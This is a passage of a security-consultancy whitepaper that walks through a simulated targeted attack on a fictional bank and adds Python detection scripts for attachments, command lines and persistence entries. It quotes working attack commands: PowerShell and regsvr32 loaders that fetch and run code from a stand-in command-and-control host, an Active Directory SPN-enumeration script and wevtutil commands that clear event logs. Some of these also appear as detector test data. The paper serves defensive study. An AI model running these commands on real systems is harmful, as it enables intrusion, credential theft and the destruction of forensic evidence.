YET ANOTHER BREACH
Analysis of a Targeted Cyber Attack
An F-Secure Consulting Whitepaper



ABOUT F-SECURE CONSULTING

F-Secure Consulting is the amalgamation of four specialist cyber security firms – MWR, nSense, Inverse Path, and Digital Assurance – combining 59 years of real-world expertise into one global, research-led technical consultancy.

We design solutions and provide tailored advice in all areas of cyber security, from incident response through to securing critical embedded systems. Like storm chasers, our curiosity keeps us ahead of the threat as it evolves.

ABOUT F-SECURE COUNTERCEPT

F-Secure Countercept provides a complete managed service for the detection of, and response to, cyber attacks, specializing in the ability to detect and respond to state-sponsored attacks (APT groups).

Unlike the traditional style of intrusion detection, based on purely 'alert driven' monitoring, F-Secure Countercept offers a 24/7/365 proactive threat-hunting service built around Endpoint Detection and Response (EDR) that utilizes security professionals with real-world experience in attack simulation and incident response.


WHERE DID WE GO WRONG?

Written in partnership with F-Secure Countercept, this paper provides an example of a modern, targeted attack against a large organization, and the actions of an unsuccessful defensive team. All its contents are based on our combined, real-world experience.

We consider how and why the many security controls companies typically have in place fail to prevent or detect such attacks. We also describe the security controls and detection methodologies that would have been effective at each stage.

THIS PAPER WILL HELP:

CISOs/CIOs
• Understand the nature of a modern targeted attack
• Ask your security teams the right questions
• Assess whether your organization could withstand such an attack

Technical cyber defense staff
• Understand the tactics typically used by modern threat actors
• Gauge whether the controls you have in place are effective against them
• Discover which new controls are worth adding to your defensive setup

In-house incident response teams
• Assess whether the data sources and technologies you have in place would allow an effective investigation and response exercise in the face of such an attack


CONTENTS

YET ANOTHER BREACH
EXAMPLE PROCESS OF A TARGETED ATTACK SIMULATION
PERIMETER BREACH – INITIAL EXPLOITATION
F-SECURE COUNTERCEPT INSIGHTS
PAYLOAD EXECUTION
F-SECURE COUNTERCEPT INSIGHTS
MAINTAINING ACCESS
F-SECURE COUNTERCEPT INSIGHTS
INTERNAL RECONNAISSANCE AND LATERAL MOVEMENT
F-SECURE COUNTERCEPT INSIGHTS
DATA EXFILTRATION
F-SECURE COUNTERCEPT INSIGHTS
ACTIONS ON OBJECTIVES
TIMELINE OF ATTACK
CONCLUSIONS


YET ANOTHER BREACH

As attackers become more persistent, defensive threat-hunting teams are adapting. The best are equally as aggressive, continually securing, monitoring, and responding to attacks on their networks.

Though reports are frequently released about the latest organization to fall victim to an Advanced Persistent Threat (APT), the reality is that relatively simple techniques are used to attack them. The APT merely relies on a lack of preparation in terms of prevention, detection, and response.

The Cyber Kill Chain concept is commonly used to illustrate an attack. Often shown as a linear process, the attacker takes eight steps to reach their goal:

Reconnaissance
The surveillance stage. Attackers assess the vulnerabilities of their target's network estate (usually from the outside-in) to design a suitable attack plan.

Intrusion
Using the data gathered through their reconnaissance, the attacker enters their target's systems, often making use of malware or security vulnerabilities.

Exploitation
The attacker exploits vulnerabilities and delivers malicious code onto the system to get a better foothold.

Privilege Escalation
To gain access to more data and permissions, the attacker escalates their privileges, often to an administrator account.

Lateral Movement
Once in the system, the attacker can move laterally to other systems and accounts to gain more leverage, e.g. higher permissions, more critical data, and greater access.

Obfuscation/anti-forensics
The attacker lays false trails, compromises data, and clears logs to confuse and slow down any forensics team.

Denial of Service
Standard access for users and systems is disrupted to stop the attack from being monitored, tracked, or blocked.

Actions on Objectives
The extraction stage. The attacker finally executes actions to achieve their goal, from encryption for ransom, to data exfiltration or destruction.

This description of the attacker methodology works at a high level, but in practice, things are rarely this linear.


EXAMPLE PROCESS OF A TARGETED ATTACK SIMULATION

Acme Bank is a large financial institution with 30,000 employees and 20 offices worldwide. The bank has a large security team of 80 staff, plus a 24/7 Security Operations Center (SOC) employing 15 individuals.

The security team uses many of the security processes and technologies common to others in its sector. For example, the bank is both PCI- and ISO27001-compliant. It also has centralized patch management solutions in place, strong password policies, employee security awareness training, network IDS/IPS appliances, secure web and email gateways, antivirus software, data-loss prevention technologies, centralized logging using SIEM technology, regular security testing, and a range of intelligence feeds.

Several waves of targeted phishing attacks were launched against Acme Bank from 2016. The attackers repeatedly compromised the bank's corporate workstations. In every instance the security team was aware of, the target workstations were removed from the network, forensically investigated, and rebuilt.

The domains used for phishing attacks and the command-and-control channels were also blocked at the organization's web and mail gateways.

No more aggressive activity was seen after the initial barrage of attacks, and it was thought the threat had been successfully repelled. However, in late July, the attackers were able to reach the SWIFT payment systems and transfer large sums of money to accounts overseas. This activity was only detected after the funds had been transferred. It is now believed that most of it was linked to a single advanced threat actor, codenamed 'Laser Tiger'.

This chain of events highlights significant deficiencies in both the preventative controls and detection capabilities deployed by Acme Bank.

"TO DETECT COMPROMISES AND RESPOND EFFECTIVELY, THREAT-HUNTERS DEVELOP A REAL-WORLD UNDERSTANDING OF OFFENSIVE TECHNIQUES WITHIN THE ATTACKER MINDSET – THEY BECOME RESEARCHERS, CONTINUALLY COLLECTING AND ANALYSING DATA."


PERIMETER BREACH – INITIAL EXPLOITATION

Laser Tiger routinely used targeted spear-phishing to obtain credentials and compromise user workstations within Acme Bank. The phishing emails contained many forms of content, ranging from malicious links and attachments to more complex social engineering techniques.

One phishing campaign that focused on credential harvesting used an employee survey targeting a few hundred users. It copied the legitimate employee survey page present on the Acme Bank website. The domain it was hosted on (acmebank-survey.com) also imitated the legitimate domain (acmebank.com), tricking many users.

Two smaller, more targeted campaigns that involved a deep level of social engineering were aimed at the assistants of key executives in the bank. Multiple messages were exchanged with a human operator pretending to work for an events management company. Their goal was to have the user download and execute a specific payload.

The attackers demonstrated knowledge of staff structure, roles, and employee relationships, suggesting the collection of a significant amount of open-source intelligence (OSINT) prior to the attack, using sources such as LinkedIn and Facebook. In one instance, a message closely matched content found on a public profile on Glassdoor.


Acme Bank had security controls in place that neither prevented nor detected this stage of the attack. Some of the most significant are listed below:

Threat Intelligence Feeds
This was a targeted attack using unique domains, IPs, and payloads. None of these were on any blacklists.

Uncategorized Site Blocking
Acme Bank's web proxy blocked access to newly-registered domains that hadn't been categorized. However, the domains used in the attack had been registered some time in advance and categorized as financial news sites. In some cases, recently expired trusted domains were re-registered and used.

Security Patching
The techniques used did not rely on any software vulnerability and therefore worked on fully-patched systems. While common executable file types were blocked at both web and mail gateways, this didn't include more esoteric executable equivalents, such as HTA files and Office documents containing macros.

F-SECURE COUNTERCEPT INSIGHTS

The attackers relied heavily on delivering link and attachment payloads via email. From a defensive perspective, it's important that security teams are given access to email data sets and the ability to perform automated analysis at scale. While it's not practical to block all potentially malicious content, it is possible to flag some for review.

Links are commonly used by attackers to direct users to malicious external content. Automated analysis of all links received in emails, and of web proxy logs to ascertain the content returned, can prove a useful technique for highlighting emails that could be harmful. In this instance, it's uncommon for HTA files or macro-enabled Microsoft Office documents to be received from external sources, so these could be flagged for review.

Varying levels of email attachment analysis can also be performed. At a basic level, collecting the names or types of attachment can highlight suspicious payloads. A more effective technique would be to analyze the payloads themselves. A static analysis of all attachments to look for embedded macros or executable content should be complemented by a dynamic analysis to understand in detail what each attachment does.

As more advanced attackers are likely to anticipate dynamic analysis solutions and use tricks to defeat them, it's still important to use more generic indicators to triage attachments for manual analysis.
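The following Python script is an added example (not part of the original paper) of the static attachment triage described above. It flags the attachment types that are rarely legitimate from external senders, and inspects Office documents for an embedded VBA project rather than trusting the extension, so a macro file renamed to .docx or an HTA hiding behind a double extension is still queued for review. The sample attachments are constructed in memory so the script runs offline; every file name and content below is made up for the example.

```python
import io
import re
import zipfile

# Attachment types that are rarely legitimate from external senders. They cover the
# payload formats the paper describes (HTA, macro-enabled Office) plus the script
# formats that Windows executes on double-click.
SUSPICIOUS_EXTENSIONS = {
    ".hta": "HTML Application, executed by mshta.exe outside the browser sandbox",
    ".docm": "macro-enabled Word document",
    ".dotm": "macro-enabled Word template",
    ".xlsm": "macro-enabled Excel workbook",
    ".xlam": "macro-enabled Excel add-in",
    ".pptm": "macro-enabled PowerPoint presentation",
    ".js": "JScript file run by wscript.exe",
    ".jse": "encoded JScript file",
    ".vbs": "VBScript file run by wscript.exe",
    ".wsf": "Windows Script File",
    ".ps1": "PowerShell script",
}

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy binary .doc/.xls (compound file)
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML .docx/.xlsx/.pptx and their *m variants
# Storage names inside a compound file are stored as UTF-16LE, so the VBA storage
# can be spotted without a full OLE parser.
OLE_VBA_STREAM = "_VBA_PROJECT".encode("utf-16-le")
# Content typical of an HTA dropper: scripting plus a COM object that launches processes.
HTA_PATTERN = re.compile(rb"<hta:application|activexobject|wscript\.shell", re.IGNORECASE)


def extension_of(filename):
    """Final extension, lower-cased; a double extension such as 'survey.pdf.hta' gives '.hta'."""
    name = filename.lower()
    return name[name.rfind("."):] if "." in name else ""


def ooxml_has_vba(data):
    """True if an OOXML zip carries a VBA project (word/vbaProject.bin, xl/vbaProject.bin, ...)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def triage_attachment(filename, data):
    """Reasons an attachment should be queued for analyst review.

    An empty list means no static indicator fired; it does not mean the file is safe."""
    reasons = []
    ext = extension_of(filename)
    if ext in SUSPICIOUS_EXTENSIONS:
        reasons.append(f"extension {ext}: {SUSPICIOUS_EXTENSIONS[ext]}")
    if data.startswith(ZIP_MAGIC) and ooxml_has_vba(data):
        reasons.append("OOXML container embeds vbaProject.bin (VBA macros)")
        if ext in (".docx", ".xlsx", ".pptx"):
            reasons.append(f"extension {ext} claims macro-free but the file contains VBA")
    if data.startswith(OLE_MAGIC) and OLE_VBA_STREAM in data:
        reasons.append("legacy OLE document contains a _VBA_PROJECT storage")
    if HTA_PATTERN.search(data[:65536]):
        reasons.append("HTML content instantiates ActiveX/WScript.Shell (HTA-style dropper)")
    return reasons


def triage_mailbox(attachments):
    """Map attachment name to its review reasons, keeping only those that fired."""
    flagged = {}
    for name, blob in attachments.items():
        reasons = triage_attachment(name, blob)
        if reasons:
            flagged[name] = reasons
    return flagged


def _ooxml(parts):
    """Build a minimal OOXML-style zip in memory from {archive path: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        for path, content in parts.items():
            zf.writestr(path, content)
    return buf.getvalue()


def build_samples():
    """Constructed attachments for this example; none of them is a real file."""
    return {
        "employee-survey.docm": _ooxml({"word/document.xml": "<w:document/>",
                                        "word/vbaProject.bin": b"\x00constructed"}),
        "agenda.docx": _ooxml({"word/document.xml": "<w:document/>"}),
        "quote.docx": _ooxml({"word/document.xml": "<w:document/>",
                              "word/vbaProject.bin": b"\x00constructed"}),
        "invoice.pdf.hta": b'<html><script>var s = new ActiveXObject("WScript.Shell");</script></html>',
        "brochure.pdf": b"%PDF-1.4 constructed placeholder, no active content",
    }


if __name__ == "__main__":
    for name, reasons in triage_mailbox(build_samples()).items():
        print(name, "->", "; ".join(reasons))
```

The extension check alone would miss quote.docx, which carries a VBA project under a macro-free extension; the container check catches it, and the mismatch between the claimed type and the content is itself reported as a reason. In a real pipeline the flagged set would be passed on to the dynamic analysis the text recommends, with everything else sampled rather than trusted.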


PAYLOAD EXECUTION

HTA files and Microsoft Office documents with embedded macros were the two primary techniques used to achieve code execution on end user workstations within the Acme Bank network. A range of phishing attacks was launched, containing payloads that made use of legitimate Windows functionality – such as PowerShell, regsvr32.exe, and the Windows script engines (WScript/JScript) – to load malicious code. The initial dropper code would commonly retrieve a remote payload and inject code directly into memory within a legitimate Windows process.

EXAMPLE 1

One of the payloads utilizing PowerShell used the IEX and WebClient functionality to download its second stage from a remote HTTP resource. Note that the dropper deliberately picks up the system proxy and the current user's credentials, so it works from behind an authenticating corporate proxy:

powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c "$u=new-object net.webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex($u.DownloadString('http://c2-domain.com/abc'))"

EXAMPLE 2

regsvr32.exe was used to run a second scripting stage from an external HTTP resource, here launched from a Windows Script Host (VBScript) dropper. The scriptlet is served with a .jpg extension to look like an image in proxy logs:

Set oShell = CreateObject("WScript.Shell")
oShell.run "regsvr32.exe /s /n /u /i:http://c2-domain.com/name.jpg scrobj.dll"


Keeping the initial payload small, and loading the second stage remotely within memory, is advantageous to attackers. It makes forensic discovery harder, and allows them to easily change the functionality of their payload in future.

These techniques were successfully used against Acme Bank, bypassing a number of security controls in place:

Antivirus
No known malicious binaries were used. Instead, legitimate Windows functionality was utilized with small, dynamic, initial payloads that loaded the second stages entirely within the memory space of legitimate processes.

Application Control
Acme Bank makes use of Microsoft AppLocker to prevent general users from launching arbitrary executables and scripts from certain locations. However, Office macros are exempt from this, and HTA files are run by mshta.exe, a signed Microsoft binary built on the Internet Explorer engine that the default AppLocker rules permit, rendering AppLocker ineffective against these payloads.

F-SECURE COUNTERCEPT INSIGHTS

Security teams need effective endpoint detection and response (EDR) software to collect useful data, like real-time process execution events across all endpoints. This is an essential first step when tracking attackers. Without it, Acme Bank's security team was essentially left blind to the actions performed on its network. Attacker process activity usually differs greatly from that of typical users. Laser Tiger, for example, used many built-in Windows tools with specific command line parameters uncommon for the average employee.

Anomaly-detection techniques applied to these data sets, along with additional scoring for particularly dangerous command line options, can be used to accurately identify suspicious uses of legitimate Windows functionality. This includes options to load code from external sources and anomalous parent-child relationships. For example, it would be unusual to see Microsoft Office open a macro-enabled document, then launch regsvr32.exe with command line arguments for loading a script from an HTTP resource.

More advanced EDR solutions could have memory analysis capabilities that also detect evidence of code injection, malicious DLL loading, and API hooking. This approach can help identify other suspicious scenarios, such as the above processes also showing evidence of reflectively loaded DLLs and/or remotely injected threads. These are traits typical of memory-resident malware.

We have used these methods to effectively detect file-free malware utilizing legitimate scripting engines and code-injection techniques.
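As an added example (not from the original paper), the Python below applies the scoring approach just described to constructed process-creation events in the shape of an EDR or Sysmon Event ID 1 feed: weighted command-line indicators for the options that load code from external sources, plus parent-child rules for a document viewer or script engine spawning another script host. Host names and command lines are made up (the two malicious ones reuse the paper's own Example 1 and Example 2 payloads and its c2-domain.com placeholder), and the weights and threshold are assumptions to be tuned against a baseline of your own administrators' activity.

```python
import re

# Weighted command-line indicators. The weights and the threshold are assumptions for
# this example; tune them against a baseline of your own administrators' activity.
CMDLINE_INDICATORS = [
    (r"/i:\s*https?://", 40, "regsvr32 /i: pointing at a URL (remote scriptlet load)"),
    (r"\bscrobj\.dll\b", 20, "scrobj.dll scriptlet handler"),
    (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", 30,
     "PowerShell fetching content over HTTP"),
    (r"\biex\b|invoke-expression", 25, "Invoke-Expression of dynamic content"),
    (r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s", 25, "encoded PowerShell command"),
    (r"-w(?:indowstyle)?\s+hidden", 15, "hidden window"),
    (r"-e(?:xecutionpolicy|p)\s+bypass", 15, "execution policy bypass"),
    (r"\bmshta(?:\.exe)?\s+(?:https?|javascript|vbscript):", 40,
     "mshta running remote or inline script"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "cmd.exe"}
SCRIPT_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


def score_event(event):
    """Score one process-creation event; returns (score, list of reasons)."""
    score, reasons = 0, []
    for pattern, weight, label in CMDLINE_INDICATORS:
        if re.search(pattern, event["cmdline"], re.IGNORECASE):
            score += weight
            reasons.append(label)
    parent, image = event["parent"].lower(), event["image"].lower()
    # Parent-child relationships: a document viewer or a script engine launching
    # another script host is rare for ordinary users and typical of a dropper.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        score += 50
        reasons.append(f"{parent} spawned {image} (document-launched script host)")
    elif parent in SCRIPT_PARENTS and image in SCRIPT_HOSTS:
        score += 30
        reasons.append(f"{parent} chained into {image}")
    return score, reasons


def triage(events, threshold=50):
    """Events scoring at or above the threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"host": ev["host"], "score": score,
                         "reasons": reasons, "cmdline": ev["cmdline"]})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


def build_events():
    """Constructed process-creation events (Sysmon Event ID 1 / EDR style, simplified)."""
    return [
        {"host": "WS-01042", "parent": "WINWORD.EXE", "image": "regsvr32.exe",
         "cmdline": "regsvr32.exe /s /n /u /i:http://c2-domain.com/name.jpg scrobj.dll"},
        {"host": "WS-00875", "parent": "mshta.exe", "image": "powershell.exe",
         "cmdline": 'powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo '
                    '-noprofile -c "$u=new-object net.webclient;'
                    'iex($u.DownloadString(\'http://c2-domain.com/abc\'))"'},
        {"host": "WS-02210", "parent": "explorer.exe", "image": "powershell.exe",
         "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\Get-Inventory.ps1"},
        {"host": "WS-00311", "parent": "msiexec.exe", "image": "regsvr32.exe",
         "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
        {"host": "WS-00512", "parent": "EXCEL.EXE", "image": "splwow64.exe",
         "cmdline": "splwow64.exe 12288"},
    ]


if __name__ == "__main__":
    for hit in triage(build_events()):
        print(hit["host"], hit["score"], "; ".join(hit["reasons"]))
```

The two benign regsvr32 and PowerShell events score zero even though they use the same binaries as the droppers: it is the combination of a network-loading option with an unusual parent, not the tool itself, that separates attacker activity from an administrator's inventory script or a vendor installer. The same scores can be fed into the frequency analysis described later for persistence entries, so that a rare command line on a handful of hosts ranks above a common one.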


MAINTAINING ACCESS

Attackers commonly seek to achieve sustained access to a network's compromised systems over a long period of time. Laser Tiger did so using multiple techniques to provide a choice of routes into Acme Bank's network. This meant that if one or two were discovered and shut down, it would still have access via other means.

One method of maintaining persistent access was the use of conditional Microsoft Outlook rules that, when triggered, would download and execute a payload in memory. This ensured their access was resistant to system reboots and logins/logoffs, i.e. every time the affected user started Microsoft Outlook, the attackers regained remote control of the workstation.

The attackers also made use of more common persistence techniques, such as registry-based Run keys and scheduled tasks. However, they avoided any that involved writing an actual file to disk on the user workstations; all techniques were file-free and loaded the malicious payload into memory from across the network.

When the attackers later targeted servers within Acme Bank's environment and gained administrative-level access, their tactics changed, and custom services were created to deliver payloads. Service executables were placed in legitimate locations within Program Files, digitally signed with a certificate obtained from a certificate authority, and made to blend in with existing software to avoid detection. Timestamps for the files were also modified to look as though they'd been present for years. For example:

Service Name: Java Update Service
Description: Provides updates for the Java™ platform
Executable Path: C:\Program Files (x86)\Java\jre1.8.0_73\bin\javau.exe

(The legitimate Java update scheduler is jusched.exe; javau.exe is the attacker's lookalike, which is exactly the kind of near-miss that a filename-only review misses and a hash or signer comparison catches.)


Acme Bank had a chance to detect the compromised workstations at this stage, but the controls they had in place failed to do so.

Security Information and Event Management (SIEM)
Logging provided Acme Bank with log sources (e.g. Windows event logs) from across its network. These sometimes included key data such as the creation of new services or scheduled tasks, but missed others, such as registry Run keys and Outlook rules. With new software and updates causing log source events to occur in vast numbers every day, but with no advanced analysis functionality or anomaly-detection capabilities in place, it was easy for malicious modifications to get lost within the background noise. As a result, the data that was actually available became relevant only in retrospect.

F-SECURE COUNTERCEPT INSIGHTS

Monitoring for new persistence entries is one of the most effective ways for teams to detect the early stages of a compromise. Windows provides a multitude of persistence mechanisms, such as services, scheduled tasks, registry locations, and start-up folders.

While Acme Bank had information relating to these mechanisms from Windows logs, it was only collected from key servers. Thus, in a snowstorm of installs and updates, without the correct analysis techniques in place, the chances of identifying a malicious compromise were poor.

An effective method of persistence detection would be to gather as much persistence data as possible from the entire workstation and server estate. This should be complete with supplementary data, such as cryptographic file hashes and digital signature information. EDR toolsets should be capable of doing this data harvesting.

The data sets can then be aggregated to perform frequency analysis and be automatically enriched using external information sources such as software libraries and data sources like VirusTotal. This makes it far easier to differentiate rapidly between legitimate updates and malicious scheduled tasks. In practice, this is the difference between:

a. A single Google Chrome update, made to 30,000 systems, using a known-good hash, and digitally signed by Google.

b. A small number of potentially malicious scheduled tasks referencing PowerShell, with options to remotely load code from an HTTP resource.

Once entries are grouped by hash, signer and command line, the first collapses into one high-prevalence, well-attested group, while the second stands out as a rare, network-loading outlier that an analyst can review in minutes.
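As an added example (not from the original paper), the Python below performs the frequency analysis described above on a constructed persistence inventory: entries collected from across an estate are grouped by type, name, command line, hash and signer, and each group is scored by rarity plus indicators such as PowerShell loading code over HTTP, an unknown hash, or an unfamiliar signer. The KNOWN_GOOD_HASHES and KNOWN_SIGNERS sets stand in for the external reputation enrichment (e.g. VirusTotal) mentioned in the text; host counts, hashes, signer names and the weights are made up for the example, and the fake "Java Update Service" entry reuses the paper's own javau.exe example.

```python
import re
from collections import defaultdict

# Made-up values standing in for real SHA-256 hashes.
CHROME_HASH = "1f" * 32
POWERSHELL_HASH = "7e" * 32
JAVAU_HASH = "9c" * 32
# Stand-in for external enrichment (a vendor catalogue or VirusTotal lookups).
KNOWN_GOOD_HASHES = {CHROME_HASH, POWERSHELL_HASH}
KNOWN_SIGNERS = {"Google LLC", "Microsoft Windows", "Microsoft Corporation"}
NETWORK_LOAD = re.compile(r"https?://|downloadstring|downloadfile|-enc", re.IGNORECASE)


def rank_persistence(entries, known_good=KNOWN_GOOD_HASHES, known_signers=KNOWN_SIGNERS):
    """Group persistence entries across the estate and score each group for review.

    Returns groups sorted by descending score. Rarity, an unknown hash, a missing or
    unfamiliar signer and network-loading PowerShell each add to the score (weights are
    assumptions for the example)."""
    total_hosts = len({e["host"] for e in entries})
    groups = defaultdict(set)
    sample = {}
    for e in entries:
        key = (e["type"], e["name"], e["cmdline"], e["sha256"], e["signer"])
        groups[key].add(e["host"])
        sample[key] = e
    ranked = []
    for key, hosts in groups.items():
        e = sample[key]
        score, reasons = 0, []
        if len(hosts) / total_hosts < 0.01:
            score += 40
            reasons.append(f"rare: present on {len(hosts)} of {total_hosts} hosts")
        if e["sha256"] not in known_good:
            score += 20
            reasons.append("hash unknown to reputation source")
        if not e["signer"]:
            score += 20
            reasons.append("unsigned")
        elif e["signer"] not in known_signers:
            score += 10
            reasons.append(f"unfamiliar signer: {e['signer']}")
        if "powershell" in e["image"].lower() and NETWORK_LOAD.search(e["cmdline"]):
            score += 40
            reasons.append("PowerShell loading code over the network")
        ranked.append({"type": e["type"], "name": e["name"], "hosts": len(hosts),
                       "score": score, "reasons": reasons, "cmdline": e["cmdline"]})
    return sorted(ranked, key=lambda r: (-r["score"], r["hosts"]))


def build_inventory(n_workstations=30000):
    """Constructed persistence inventory: one Chrome updater task per workstation, a
    PowerShell download task on three phished hosts, and the paper's fake Java service."""
    entries = []
    chrome = r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"
    for i in range(n_workstations):
        entries.append({"host": f"WS-{i:05d}", "type": "scheduled_task",
                        "name": "GoogleUpdateTaskMachineUA", "image": chrome,
                        "cmdline": f'"{chrome}" /ua /installsource scheduler',
                        "sha256": CHROME_HASH, "signer": "Google LLC"})
    for host in ("WS-01042", "WS-00875", "WS-02210"):
        entries.append({"host": host, "type": "scheduled_task", "name": "AdobeFlashUpdate",
                        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                        "cmdline": "powershell.exe -w hidden -c \"iex (New-Object Net.WebClient)"
                                   ".DownloadString('http://c2-domain.com/u')\"",
                        "sha256": POWERSHELL_HASH, "signer": "Microsoft Windows"})
    javau = r"C:\Program Files (x86)\Java\jre1.8.0_73\bin\javau.exe"
    for host in ("SRV-STG-03", "SRV-APP-11"):
        entries.append({"host": host, "type": "service", "name": "Java Update Service",
                        "image": javau, "cmdline": f'"{javau}"',
                        "sha256": JAVAU_HASH, "signer": "Example Software Ltd"})
    return entries


if __name__ == "__main__":
    for group in rank_persistence(build_inventory()):
        print(group["score"], group["type"], group["name"], group["hosts"],
              "; ".join(group["reasons"]))
```

Grouping on the command line and not just the image is what makes the PowerShell task visible: its hash and signer are those of a legitimate Microsoft binary, so hash reputation alone would clear it, while the fake Java service has a valid but unfamiliar signer and a hash nobody has seen before. Thirty thousand Chrome entries collapse into a single well-attested group that sinks to the bottom of the list.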


INTERNAL RECONNAISSANCE AND LATERAL MOVEMENT

Successfully breaching the perimeter is the first step of any targeted attack against a large organization. With access to workstations inside the Acme Bank network, the attackers were able to then begin the information-gathering phase. Their aim: to learn more about the internal network architecture and applications in use, with a view to extending their access across the environment.

The initial stages of this reconnaissance involved retrieving information about the domain, such as users, groups, group memberships, and key systems and services. Instead of more traditional techniques, like large-scale port scanning, most information-gathering activities were performed using in-memory PowerShell and built-in Windows functionality, such as DNS, WMI, and LDAP.

The majority of network traffic in this case simply used LDAP connections to domain controllers. This gave the attackers detailed knowledge of the wider internal structure of the network, which systems might be of interest to them, and which users were worth targeting in order to gain the necessary access.

Gaining more privileged access allowed the attackers to move from their existing compromised workstations to other administrative workstations and key servers. Firstly, the attackers conducted SPN scanning via LDAP to extract information about all services present within the Active Directory forest. This technique returns information about hosts and services running across the network, while only requiring a single TCP connection to LDAP on a domain controller:

# Resolve the forest root domain and turn it into a distinguished name
$ADForestInfoRootDomain = ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).RootDomain
$ADForestInfoRootDomainDN = "DC=" + $ADForestInfoRootDomain -Replace("\.", ',DC=')
# Bind to the Global Catalog so every domain in the forest is covered by one query
$ADDomainInfoLGCDN = 'GC://' + $ADForestInfoRootDomainDN
$root = [ADSI]$ADDomainInfoLGCDN
# A single paged LDAP search returns every account that has a registered SPN
$ADSPNSearcher = New-Object System.DirectoryServices.DirectorySearcher($root, "(serviceprincipalname=*)")
$ADSPNSearcher.PageSize = 500
$AllADSQLServerSPNs = $ADSPNSearcher.FindAll()


With this information to hand, the attackers were able to use their existing credentials to request Kerberos service tickets for all the services present across the network. Kerberos service tickets are encrypted using a key derived from the password of the service's domain account itself. This allows them to be used to perform offline password-cracking attacks without triggering IDS systems or account lockout thresholds, as would be the case for a normal online password-guessing attack. Insufficiently complex passwords can then be cracked, with privileged service account passwords often allowing a much greater level of access across the network.

Evidence of unusually large numbers of Kerberos service ticket requests (Windows Security event ID 4769) was seen in logs from Windows domain controllers for specific users that were later determined to have been victims of the initial spear-phishing attacks. It's believed the attackers were able to crack some of these Kerberos service tickets so they could obtain the passwords for domain service accounts. Unfortunately for Acme Bank, this was only discovered during forensic investigation post-breach.

[Figure: Kerberos service ticket flow. The client authenticates to the domain and receives a Ticket Granting Ticket (TGT); it looks up the SPN of the target service (e.g. Exchange), presents the TGT and SPN to the Ticket Granting Service (TGS), and receives a TGS ticket encrypted with the service account's key; access is granted when that ticket is presented to the service.]


Little forensic evidence of actual lateral movement was found after the attack. While Windows logs for domain controllers and key production servers were being collected using Acme Bank's SIEM, logs from the wider network of workstations and development and test environments weren't collected. Suspicious activity within the domain controller logs was identified for one particular service account and one admin user who worked on the SWIFT environment. Subsequent manual forensic investigation of the staging server where the service account was in use, and of the admin user's personal workstation, revealed some of the lateral movement techniques used.

Using the following commands, Windows event logs were cleared by the attackers, removing evidence of their activity. However, traces of the relevant logs were successfully recovered from volume shadow copies on the system:

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
wevtutil.exe cl "Application"
wevtutil.exe cl "Security"
wevtutil.exe cl "System"

Clearing a log is itself a loud event: the Security log records event ID 1102 ("The audit log was cleared") as the first entry of the new log, and clearing any other log writes event ID 104 to the System log. Both are worth forwarding and alerting on, since an attacker cannot erase them without generating a fresh copy.

Remote access to the systems was gained using both network logons (type 3) over TCP/445 to spawn new processes, and RDP access (logon type 10, RemoteInteractive) via TCP/3389 in the case of the staging server. The service account was identified as having a weak password, so it's assumed this was compromised via the SPN scanning and Kerberos service ticket cracking.


Another domain account present on this system had workstation admin rights and, from the timeline of events, it appeared this was used to specifically target the SWIFT admin user's workstation and harvest their privileged credentials from memory. Consequently, it's believed the workstation admin account was harvested from the compromised staging server, allowing the attackers to directly target the administrative users responsible for the SWIFT environment.

Shortly after these events, wide-ranging access using the admin's account was observed within the SWIFT production environment from the IP address of one of the original compromised workstations, far in excess of the usual access patterns.

[Figure: lateral movement from the compromised workstation to the staging server and the SWIFT admin's workstation over RDP and SMB, with privileged credentials harvested from memory using Mimikatz.]

Numerous security controls in Acme Bank's environment failed at this stage of the attack, but some of the key controls are outlined below:

Password Policy
While a strong password policy was in place for new user accounts, the affected service account was years old without a set password expiry. Offline password cracking is effective against all but the strongest passwords, so the lack of regular password-cracking exercises within Acme Bank let this account go unnoticed and allowed the attackers to compromise it.

SIEM User Account Monitoring
Acme Bank's SIEM consumed all Windows domain controller logs and critical production server logs but not logs from the wider infrastructure. This meant it was blind to attacks targeting development and test environments, as well as the entire workstation estate. Additionally, all views and alerting were focused on account brute-forcing and the creation of new user accounts or modification of existing group memberships. Kerberos service ticket-specific monitoring wasn't performed, meaning the sudden request for thousands of Kerberos service tickets by a single employee user account went unnoticed.

Network IDS
IDS appliances were placed at strategic locations to monitor network traffic for signs of attack, with events reported to the centralized SIEM. These were highly tuned to identify large-scale network port scanning and similar network enumeration techniques. However, they couldn't identify modern enumeration techniques that utilize LDAP queries over a single connection to a small number of domain controllers. The number of alerts generated by the IDS was also extremely high and false-positive prone, so any relevant events were likely to be swallowed by a sea of noise.

Host-Based Firewalls
